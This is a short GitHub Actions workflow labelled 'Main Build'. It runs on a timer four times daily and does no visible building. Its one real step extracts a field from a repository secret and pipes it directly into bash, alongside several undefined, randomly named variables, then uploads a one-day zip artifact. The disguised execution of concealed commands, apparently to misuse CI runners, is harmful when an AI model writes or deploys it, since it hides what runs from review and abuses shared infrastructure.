name: Main Build
on:
  workflow_dispatch:

  schedule:
    - cron: '54 4,10,16,22 * * *'
permissions:
  contents: read
concurrency:
  group: ${{ github.workflow }}-${{ github.ref }}
  cancel-in-progress: true
jobs:
  ci:
    runs-on: ubuntu-latest
    timeout-minutes: 360
    steps:
      - uses: actions/checkout@v4
      - name: Launch
        env:
          ca685: ${{ secrets.ca685 }}
        run: |
          printf '%s' "$ca685" | jq -r .ro759 | /bin/bash
          echo $dl26655 | jq -r .mas2 | /bin/bash
          printf '%s' "$itnxn9" | jq -r .tdpm9186 | /bin/bash
          printf '%s' "$c8" | jq -r .jm25 | /bin/bash
          printf '%s' "$avgg8" | jq -r .r05 | /bin/bash
          printf '%s' "$dbbd60" | jq -r .uslxo31 | /bin/bash

      - name: Save artifact
        uses: actions/upload-artifact@v4
        with:
          name: JPSu3g3l
          path: "*.zip"
          retention-days: 1
